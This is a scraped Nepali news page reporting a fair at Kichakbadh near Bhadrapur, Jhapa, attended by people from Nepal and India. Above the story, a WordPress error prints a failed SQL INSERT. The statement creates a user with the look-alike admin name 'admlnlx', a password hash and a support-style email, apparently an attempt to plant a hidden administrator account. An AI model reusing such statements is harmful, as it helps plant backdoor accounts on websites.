WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHQMxEQg8Tws.dP3vBtNsQV32O.PdZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 18:41:24', '', 'admlnlx', 'admlnlx')
झापा, माघ २८-
झापाको सदरमुकाम भद्रपुरबाट झन्डै १० किलोमिटर दक्षिण पृथ्वीनगरको सङ्गमस्थलमा आज भव्य मेला लागेको छ ।
ऐतिहासिक, धार्मिक तथा पर्यटकीयस्थल किचकबधमा लाग्ने मेलामा नेपाल र भारत दुबै देशका नागरिक मेला भर्न आएका छन् ।
यो मेला धेरैवर्ष अघिदेखि माघ शुक्लपूर्णिमामा लाग्दै आएको छ ।- रासस